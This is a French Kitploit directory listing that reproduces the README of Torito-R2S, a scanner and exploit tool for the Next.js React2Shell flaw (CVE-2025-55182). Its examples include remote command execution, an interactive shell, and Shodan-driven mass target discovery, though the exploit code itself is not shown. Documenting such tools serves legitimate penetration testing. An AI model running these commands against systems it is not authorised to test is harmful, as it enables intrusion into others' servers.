Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Torito-R2S — Torito React2Shell - Outil de scan et d'exploitation (CVE-2025-55182 / 66478) | Kitploit
Outils/GitHubGitHub/toritoio/torito-r2s
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleÉnumération de Sous-domaines
GitHubtoritoio/torito-r2s

Torito-R2S

Torito React2Shell - Outil de scan et d'exploitation (CVE-2025-55182 / 66478)

Voir le dépôt
413il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Site web
Partager

Torito React2Shell Scanner & Exploit Tool (CVE-2025-55182 / 66478)

Torito Logo

Scanner priorisant la détection pour cibles RSC Next.js avec mode optionnel de preuve de concept (PoC confirm) et d'exploitation/shell. À utiliser uniquement sur des systèmes que vous êtes autorisé à tester.

Prérequis

  • Python 3.9+
  • pip install -r requirements.txt
  • Binaire Subfinder dans PATH pour --subfinder (installation via Homebrew brew install subfinder ou Go : go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest ; projet : https://github.com/projectdiscovery/subfinder)
  • L'utilisation de Shodan nécessite pip install shodan (déjà dans requirements) et une clé : export SHODAN_API_KEY=... avec des crédits de requête disponibles

Utilisation

root@kitploit:~
python3 torito_r2s.py --help

Options

Exemples

Sondage sûr (cible unique)

root@kitploit:~
python3 torito_r2s.py -u https://cible.com

Confirmation de preuve de concept (redirection par canal auxiliaire)

root@kitploit:~
python3 torito_r2s.py -u https://cible.com --confirm

Exploitation avec commande personnalisée

root@kitploit:~
python3 torito_r2s.py -u https://cible.com --exploit-cmd "whoami"

Shell interactif dès la première cible trouvée

root@kitploit:~
python3 torito_r2s.py -u https://cible.com --shell

Analyse de liste avec exportations

root@kitploit:~
python3 torito_r2s.py -l hôtes.txt -t 40 --confirm --json-out résultats.json --csv-out résultats.csv

Shodan uniquement (nécessite clé et crédits)

root@kitploit:~
export SHODAN_API_KEY=votre_clé
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm

Subfinder uniquement

root@kitploit:~
python3 torito_r2s.py --subfinder cible.com --confirm

Proxy (Burp/Caido)

root@kitploit:~
python3 torito_r2s.py -u https://cible.com --proxy http://127.0.0.1:8080 --confirm

Pipeline via stdin

root@kitploit:~
cat urls.txt | python3 torito_r2s.py --confirm

Notes sur la sortie

  • Le tableau affiche l'empreinte (NX/AR), le sondage, la confirmation, l'exploitation.
  • Les digests d'exploitation sont décodés en base64 quand possible ; le mode verbeux montre des aperçus.
  • JSON/CSV incluent le digest brut et la sortie décodée (si présente).

Sécurité

  • À utiliser uniquement pour des tests autorisés.
  • L'exécution par défaut est un sondage non destructif ; l'exploitation s'exécute uniquement avec --exploit-cmd ou --shell.
Télécharger l’outil
OptionDescriptionDéfaut
-u, --url URLURL cible unique—
-l, --list FICHIERFichier avec cibles (une par ligne)—
--subfinder DOMAINELancer subfinder pour le domaine et ajouter les résultats—
--shodan REQUÊTERecherche Shodan (nécessite SHODAN_API_KEY avec crédits)—
--shodan-limit NMax de résultats Shodan par requête100
-t, --threads NConcurrence20
--timeout SECTimeout des requêtes10
--proxy URLProxy HTTP/HTTPS—
--confirmExécuter la preuve de concept basée sur redirection après le sondagedésactivé
--exploit-cmd "CMD"Exécuter une charge utile RCE avec la commande—
--shell, -iOuvrir un shell interactif dès la première exploitation réussie (commande par défaut : id)désactivé
--json-out FICHIERSauvegarder les résultats en JSON—
--csv-out FICHIERSauvegarder les résultats en CSV—
-v, --verboseAfficher les sorties/digests décodés dans le tableaudésactivé